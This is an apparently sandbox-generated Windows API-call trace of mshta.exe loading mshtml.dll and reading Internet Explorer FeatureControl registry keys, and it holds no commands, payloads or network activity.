[0077.912] SetLastError (dwErrCode=0x0)
[0077.912] GetLastError () returned 0x0
[0077.912] SetLastError (dwErrCode=0x0)
[0077.912] GetLastError () returned 0x0
[0077.912] SetLastError (dwErrCode=0x0)
[0077.912] GetLastError () returned 0x0
[0077.912] SetLastError (dwErrCode=0x0)
[0077.912] GetLastError () returned 0x0
[0077.912] SetLastError (dwErrCode=0x0)
[0077.912] GetLastError () returned 0x0
[0077.912] SetLastError (dwErrCode=0x0)
[0077.912] GetLastError () returned 0x0
[0077.912] SetLastError (dwErrCode=0x0)
[0077.912] GetLastError () returned 0x0
[0077.912] SetLastError (dwErrCode=0x0)
[0077.912] GetLastError () returned 0x0
[0077.913] SetLastError (dwErrCode=0x0)
[0077.913] GetLastError () returned 0x0
[0077.913] SetLastError (dwErrCode=0x0)
[0077.913] GetLastError () returned 0x0
[0077.913] SetLastError (dwErrCode=0x0)
[0077.913] GetLastError () returned 0x0
[0077.913] SetLastError (dwErrCode=0x0)
[0077.913] GetLastError () returned 0x0
[0077.913] SetLastError (dwErrCode=0x0)
[0077.913] GetLastError () returned 0x0
[0077.913] SetLastError (dwErrCode=0x0)
[0077.913] GetLastError () returned 0x0
[0077.913] SetLastError (dwErrCode=0x0)
[0077.913] GetLastError () returned 0x0
[0077.913] SetLastError (dwErrCode=0x0)
[0077.913] GetLastError () returned 0x0
[0077.913] SetLastError (dwErrCode=0x0)
[0077.913] GetLastError () returned 0x0
[0077.914] SetLastError (dwErrCode=0x0)
[0077.914] GetLastError () returned 0x0
[0077.914] SetLastError (dwErrCode=0x0)
[0077.914] GetLastError () returned 0x0
[0077.914] SetLastError (dwErrCode=0x0)
[0077.914] GetLastError () returned 0x0
[0077.914] SetLastError (dwErrCode=0x0)
[0077.914] GetLastError () returned 0x0
[0077.914] SetLastError (dwErrCode=0x0)
[0077.914] GetLastError () returned 0x0
[0077.914] SetLastError (dwErrCode=0x0)
[0077.914] GetLastError () returned 0x0
[0077.916] SetLastError (dwErrCode=0x0)
[0077.916] GetLastError () returned 0x0
[0077.916] SetLastError (dwErrCode=0x0)
[0077.916] GetLastError () returned 0x0
[0077.917] SetLastError (dwErrCode=0x0)
[0077.917] GetLastError () returned 0x0
[0077.917] SetLastError (dwErrCode=0x0)
[0077.917] GetLastError () returned 0x0
[0077.917] SetLastError (dwErrCode=0x0)
[0077.917] GetLastError () returned 0x0
[0077.917] SetLastError (dwErrCode=0x0)
[0077.917] GetLastError () returned 0x0
[0077.917] SetLastError (dwErrCode=0x0)
[0077.917] GetLastError () returned 0x0
[0077.917] SetLastError (dwErrCode=0x0)
[0077.917] GetLastError () returned 0x0
[0077.917] SetLastError (dwErrCode=0x0)
[0077.917] GetLastError () returned 0x0
[0077.917] SetLastError (dwErrCode=0x0)
[0077.917] GetLastError () returned 0x0
[0077.917] SetLastError (dwErrCode=0x0)
[0077.917] GetLastError () returned 0x0
[0077.918] SetLastError (dwErrCode=0x0)
[0077.918] GetLastError () returned 0x0
[0077.918] SetLastError (dwErrCode=0x0)
[0077.918] GetLastError () returned 0x0
[0077.918] SetLastError (dwErrCode=0x0)
[0077.918] GetLastError () returned 0x0
[0077.918] SetLastError (dwErrCode=0x0)
[0077.918] GetLastError () returned 0x0
[0077.918] SetLastError (dwErrCode=0x0)
[0077.918] GetLastError () returned 0x0
[0077.918] SetLastError (dwErrCode=0x0)
[0077.918] GetLastError () returned 0x0
[0077.918] SetLastError (dwErrCode=0x0)
[0077.918] GetLastError () returned 0x0
[0077.918] SetLastError (dwErrCode=0x0)
[0077.918] GetLastError () returned 0x0
[0077.918] SetLastError (dwErrCode=0x0)
[0077.918] GetLastError () returned 0x0
[0077.918] SetLastError (dwErrCode=0x0)
[0077.919] GetLastError () returned 0x0
[0077.919] SetLastError (dwErrCode=0x0)
[0077.919] GetLastError () returned 0x0
[0077.919] SetLastError (dwErrCode=0x0)
[0077.919] GetLastError () returned 0x0
[0077.919] SetLastError (dwErrCode=0x0)
[0077.919] GetLastError () returned 0x0
[0077.919] SetLastError (dwErrCode=0x0)
[0077.919] GetLastError () returned 0x0
[0077.919] SetLastError (dwErrCode=0x0)
[0077.919] GetLastError () returned 0x0
[0077.919] SetLastError (dwErrCode=0x0)
[0077.919] GetLastError () returned 0x0
[0077.919] SetLastError (dwErrCode=0x0)
[0077.919] GetLastError () returned 0x0
[0077.919] SetLastError (dwErrCode=0x0)
[0077.919] GetLastError () returned 0x0
[0077.919] SetLastError (dwErrCode=0x0)
[0077.919] GetLastError () returned 0x0
[0077.920] SetLastError (dwErrCode=0x0)
[0077.920] GetLastError () returned 0x0
[0077.920] SetLastError (dwErrCode=0x0)
[0077.920] GetLastError () returned 0x0
[0077.920] SetLastError (dwErrCode=0x0)
[0077.920] GetLastError () returned 0x0
[0077.920] SetLastError (dwErrCode=0x0)
[0077.920] GetLastError () returned 0x0
[0077.920] SetLastError (dwErrCode=0x0)
[0077.920] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x8, Size=0x61c) returned 0x31770
[0077.921] HeapFree (in: hHeap=0x30000, dwFlags=0x0, lpMem=0x30e78 | out: hHeap=0x30000) returned 1
[0077.923] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x482aef) returned 0x0
[0077.923] GetLastError () returned 0x0
[0077.923] SetLastError (dwErrCode=0x0)
[0077.923] GetLastError () returned 0x0
[0077.923] SetLastError (dwErrCode=0x0)
[0077.923] GetLastError () returned 0x0
[0077.923] SetLastError (dwErrCode=0x0)
[0077.923] GetLastError () returned 0x0
[0077.924] SetLastError (dwErrCode=0x0)
[0077.924] GetLastError () returned 0x0
[0077.924] SetLastError (dwErrCode=0x0)
[0077.924] GetLastError () returned 0x0
[0077.924] SetLastError (dwErrCode=0x0)
[0077.924] GetLastError () returned 0x0
[0077.924] SetLastError (dwErrCode=0x0)
[0077.924] GetLastError () returned 0x0
[0077.924] SetLastError (dwErrCode=0x0)
[0077.924] GetLastError () returned 0x0
[0077.924] SetLastError (dwErrCode=0x0)
[0077.924] GetLastError () returned 0x0
[0077.924] SetLastError (dwErrCode=0x0)
[0077.924] GetLastError () returned 0x0
[0077.924] SetLastError (dwErrCode=0x0)
[0077.924] GetLastError () returned 0x0
[0077.924] SetLastError (dwErrCode=0x0)
[0077.924] GetLastError () returned 0x0
[0077.925] SetLastError (dwErrCode=0x0)
[0077.925] GetLastError () returned 0x0
[0077.925] SetLastError (dwErrCode=0x0)
[0077.925] GetLastError () returned 0x0
[0077.925] SetLastError (dwErrCode=0x0)
[0077.925] GetLastError () returned 0x0
[0077.925] SetLastError (dwErrCode=0x0)
[0077.925] GetLastError () returned 0x0
[0077.925] SetLastError (dwErrCode=0x0)
[0077.925] GetLastError () returned 0x0
[0077.925] SetLastError (dwErrCode=0x0)
[0077.925] GetLastError () returned 0x0
[0077.925] SetLastError (dwErrCode=0x0)
[0077.925] GetLastError () returned 0x0
[0077.925] SetLastError (dwErrCode=0x0)
[0077.925] GetLastError () returned 0x0
[0077.925] SetLastError (dwErrCode=0x0)
[0077.925] GetLastError () returned 0x0
[0077.926] SetLastError (dwErrCode=0x0)
[0077.926] GetLastError () returned 0x0
[0077.926] SetLastError (dwErrCode=0x0)
[0077.926] GetLastError () returned 0x0
[0077.926] SetLastError (dwErrCode=0x0)
[0077.926] GetLastError () returned 0x0
[0077.926] SetLastError (dwErrCode=0x0)
[0077.926] GetLastError () returned 0x0
[0077.926] SetLastError (dwErrCode=0x0)
[0077.926] GetLastError () returned 0x0
[0077.926] SetLastError (dwErrCode=0x0)
[0077.926] GetLastError () returned 0x0
[0077.926] SetLastError (dwErrCode=0x0)
[0077.926] GetLastError () returned 0x0
[0077.926] SetLastError (dwErrCode=0x0)
[0077.926] GetLastError () returned 0x0
[0077.926] SetLastError (dwErrCode=0x0)
[0077.926] GetLastError () returned 0x0
[0077.927] SetLastError (dwErrCode=0x0)
[0077.927] GetVersion () returned 0x1db10106
[0077.927] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x769b0000
[0077.927] GetProcAddress (hModule=0x769b0000, lpProcName="HeapSetInformation") returned 0x769c5609
[0077.927] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0077.927] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x0, Size=0x105) returned 0x31d98
[0077.927] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x0, Size=0x105) returned 0x31ea8
[0077.927] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x39fc6c | out: phkResult=0x39fc6c*=0x46) returned 0x0
[0077.927] RegQueryValueExA (in: hKey=0x46, lpValueName=0x0, lpReserved=0x0, lpType=0x39fc64, lpData=0x31d98, lpcbData=0x39fc60*=0x105 | out: lpType=0x39fc64*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x39fc60*=0x1f) returned 0x0
[0077.928] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x73870000
[0079.845] GetProcessHeap () returned 0x110000
[0079.845] GetVersion () returned 0x1db10106
[0079.845] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x769b0000
[0079.845] GetProcAddress (hModule=0x769b0000, lpProcName="HeapSetInformation") returned 0x769c5609
[0079.845] HeapSetInformation (HeapHandle=0x110000, HeapInformationClass=0x0, HeapInformation=0x39f8f4, HeapInformationLength=0x4) returned 1
[0079.845] malloc (_Size=0x80) returned 0x5f2680
[0079.845] GetVersion () returned 0x1db10106
[0079.846] GetVersionExA (in: lpVersionInformation=0x39f7cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x39f7cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0079.846] __dllonexit () returned 0x73a9717c
[0079.846] __dllonexit () returned 0x73a973bd
[0079.846] GetProcessHeap () returned 0x110000
[0079.846] __dllonexit () returned 0x73a97435
[0079.846] __dllonexit () returned 0x73a96e75
[0079.846] __dllonexit () returned 0x73a96ff5
[0079.846] __dllonexit () returned 0x73a971be
[0079.846] __dllonexit () returned 0x73a972e2
[0079.847] __dllonexit () returned 0x73a97320
[0079.847] __dllonexit () returned 0x73a97370
[0079.847] __dllonexit () returned 0x73a96e53
[0079.847] __dllonexit () returned 0x73a96e66
[0079.847] __dllonexit () returned 0x73a96a3e
[0079.847] __dllonexit () returned 0x73a96a46
[0079.847] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc131
[0079.847] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc131
[0079.847] __dllonexit () returned 0x73a96a60
[0079.848] __dllonexit () returned 0x73a96a7a
[0079.848] __dllonexit () returned 0x73a96a93
[0079.848] __dllonexit () returned 0x73a96aa7
[0079.848] __dllonexit () returned 0x73a96ac1
[0079.848] __dllonexit () returned 0x73a971f1
[0079.848] __dllonexit () returned 0x73a96ad0
[0079.848] __dllonexit () returned 0x73a96adf
[0079.848] __dllonexit () returned 0x73a96aee
[0079.848] __dllonexit () returned 0x73a96afd
[0079.848] __dllonexit () returned 0x73a96b0d
[0079.848] __dllonexit () returned 0x73a9720c
[0079.849] __dllonexit () returned 0x73a96b1c
[0079.849] __dllonexit () returned 0x73a96b2f
[0079.849] __dllonexit () returned 0x73a96b49
[0079.849] __dllonexit () returned 0x73a96b58
[0079.849] __dllonexit () returned 0x73a96b67
[0079.849] __dllonexit () returned 0x73a96b76
[0079.849] __dllonexit () returned 0x73a96b85
[0079.849] __dllonexit () returned 0x73a96b94
[0079.849] __dllonexit () returned 0x73a96ba3
[0079.850] __dllonexit () returned 0x73a96bb2
[0079.850] __dllonexit () returned 0x73a96bc1
[0079.850] __dllonexit () returned 0x73a96bd0
[0079.850] __dllonexit () returned 0x73a96bdf
[0079.850] __dllonexit () returned 0x73a96bee
[0079.850] __dllonexit () returned 0x73a96bfd
[0079.850] __dllonexit () returned 0x73a96c0c
[0079.850] __dllonexit () returned 0x73a96c1b
[0079.850] __dllonexit () returned 0x73a96c2a
[0079.851] __dllonexit () returned 0x73a96c3d
[0079.851] __dllonexit () returned 0x73a96c4c
[0079.851] __dllonexit () returned 0x73a96c5b
[0079.851] __dllonexit () returned 0x73a96c75
[0079.851] __dllonexit () returned 0x73a96c8f
[0079.851] __dllonexit () returned 0x73a96ca9
[0079.851] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153
[0079.851] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153
[0079.851] __dllonexit () returned 0x73a96cb1
[0079.852] __dllonexit () returned 0x73a97294
[0079.852] __dllonexit () returned 0x73a96ccb
[0079.852] __dllonexit () returned 0x73a96cd3
[0079.852] __dllonexit () returned 0x73a96ce2
[0079.852] __dllonexit () returned 0x73a96cf1
[0079.852] __dllonexit () returned 0x73a96d00
[0079.852] __dllonexit () returned 0x73a8f72d
[0079.852] __dllonexit () returned 0x73a96d43
[0079.852] __dllonexit () returned 0x73a96d56
[0079.852] __dllonexit () returned 0x73a8f095
[0079.853] __dllonexit () returned 0x73a96d65
[0079.853] __dllonexit () returned 0x73a96d78
[0079.853] __dllonexit () returned 0x73a96d87
[0079.853] __dllonexit () returned 0x73a96d9a
[0079.853] __dllonexit () returned 0x73a92256
[0079.853] __dllonexit () returned 0x73a9679d
[0079.853] __dllonexit () returned 0x73a96dd5
[0079.854] __dllonexit () returned 0x73a96df8
[0079.854] __dllonexit () returned 0x73a96e07
[0079.854] __dllonexit () returned 0x73a976cb
[0079.854] __dllonexit () returned 0x73a96e1a
[0079.854] __dllonexit () returned 0x73a972aa
[0079.854] __dllonexit () returned 0x73a972cb
[0079.854] __dllonexit () returned 0x73a96e3a
[0079.855] GetCurrentThreadId () returned 0xe84
[0079.855] CoCreateGuid (in: pguid=0x73daad20 | out: pguid=0x73daad20*(Data1=0xd38c3106, Data2=0xd951, Data3=0x4666, Data4=([0]=0xaa, [1]=0x2d, [2]=0x25, [3]=0x91, [4]=0x36, [5]=0xb4, [6]=0x6e, [7]=0x28))) returned 0x0
[0079.857] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x200) returned 0x12e818
[0079.857] __dllonexit () returned 0x73a9733d
[0079.857] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x39f26c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0079.857] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe"
[0079.858] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4
[0079.858] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8
[0079.858] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x12ea20
[0079.858] SHRegGetValueW () returned 0x2
[0079.858] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b8 | out: phkResult=0x39f4b8*=0x0) returned 0x2
[0079.858] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b4 | out: phkResult=0x39f4b4*=0x0) returned 0x2
[0079.858] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x98) returned 0x0
[0079.858] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x9c) returned 0x0
[0079.859] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.859] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.859] RegCloseKey (hKey=0x0) returned 0x6
[0079.859] RegCloseKey (hKey=0x0) returned 0x6
[0079.859] RegCloseKey (hKey=0x98) returned 0x0
[0079.859] RegCloseKey (hKey=0x9c) returned 0x0
[0079.859] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x9c) returned 0x0
[0079.859] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x98) returned 0x0
[0079.860] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.860] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.860] RegCloseKey (hKey=0x0) returned 0x6
[0079.860] RegCloseKey (hKey=0x0) returned 0x6
[0079.860] RegCloseKey (hKey=0x9c) returned 0x0
[0079.860] RegCloseKey (hKey=0x98) returned 0x0
[0079.860] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x98) returned 0x0
[0079.860] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x9c) returned 0x0
[0079.860] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.860] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.860] RegCloseKey (hKey=0x0) returned 0x6
[0079.860] RegCloseKey (hKey=0x0) returned 0x6
[0079.860] RegCloseKey (hKey=0x98) returned 0x0
[0079.861] RegCloseKey (hKey=0x9c) returned 0x0
[0079.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x9c) returned 0x0
[0079.861] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x98) returned 0x0
[0079.861] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.861] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0xa0) returned 0x0
[0079.861] SHRegGetValueW () returned 0x2
[0079.861] SHRegGetValueW () returned 0x2
[0079.861] RegCloseKey (hKey=0xa0) returned 0x0
[0079.861] RegCloseKey (hKey=0x0) returned 0x6
[0079.861] RegCloseKey (hKey=0x0) returned 0x6
[0079.861] RegCloseKey (hKey=0x9c) returned 0x0
[0079.861] RegCloseKey (hKey=0x98) returned 0x0
[0079.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x98) returned 0x0
[0079.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x9c) returned 0x0
[0079.862] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.862] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.862] RegCloseKey (hKey=0x0) returned 0x6
[0079.862] RegCloseKey (hKey=0x0) returned 0x6
[0079.862] RegCloseKey (hKey=0x98) returned 0x0
[0079.862] RegCloseKey (hKey=0x9c) returned 0x0
[0079.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x9c) returned 0x0
[0079.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x98) returned 0x0
[0079.862] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.862] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.863] RegCloseKey (hKey=0x0) returned 0x6
[0079.863] RegCloseKey (hKey=0x0) returned 0x6
[0079.863] RegCloseKey (hKey=0x9c) returned 0x0
[0079.863] RegCloseKey (hKey=0x98) returned 0x0
[0079.863] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x98) returned 0x0
[0079.863] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x9c) returned 0x0
[0079.863] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.863] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.863] RegCloseKey (hKey=0x0) returned 0x6
[0079.863] RegCloseKey (hKey=0x0) returned 0x6
[0079.863] RegCloseKey (hKey=0x98) returned 0x0
[0079.863] RegCloseKey (hKey=0x9c) returned 0x0
[0079.863] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x9c) returned 0x0
[0079.864] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x98) returned 0x0
[0079.864] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.864] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.864] RegCloseKey (hKey=0x0) returned 0x6
[0079.864] RegCloseKey (hKey=0x0) returned 0x6
[0079.864] RegCloseKey (hKey=0x9c) returned 0x0
[0079.865] RegCloseKey (hKey=0x98) returned 0x0
[0079.865] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x98) returned 0x0
[0079.865] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x9c) returned 0x0
[0079.865] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.865] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.865] RegCloseKey (hKey=0x0) returned 0x6
[0079.865] RegCloseKey (hKey=0x0) returned 0x6
[0079.865] RegCloseKey (hKey=0x98) returned 0x0
[0079.866] RegCloseKey (hKey=0x9c) returned 0x0
[0079.866] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x9c) returned 0x0
[0079.866] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x98) returned 0x0
[0079.866] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.866] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.866] RegCloseKey (hKey=0x0) returned 0x6
[0079.866] RegCloseKey (hKey=0x0) returned 0x6
[0079.866] RegCloseKey (hKey=0x9c) returned 0x0
[0079.866] RegCloseKey (hKey=0x98) returned 0x0
[0079.866] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x98) returned 0x0
[0079.867] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x9c) returned 0x0
[0079.867] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.867] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x39f46c | out: phkResult=0x39f46c*=0x0) returned 0x2
[0079.871] RegCloseKey (hKey=0x0) returned 0x6
[0079.871] RegCloseKey (hKey=0x0) returned 0x6
[0079.871] RegCloseKey (hKey=0x98) returned 0x0
[0079.871] RegCloseKey (hKey=0x9c) returned 0x0
[0079.872] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4ac | out: phkResult=0x39f4ac*=0x9c) returned 0x0
[0079.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f4b0 | out: phkResult=0x39f4b0*=0x98) returned 0x0
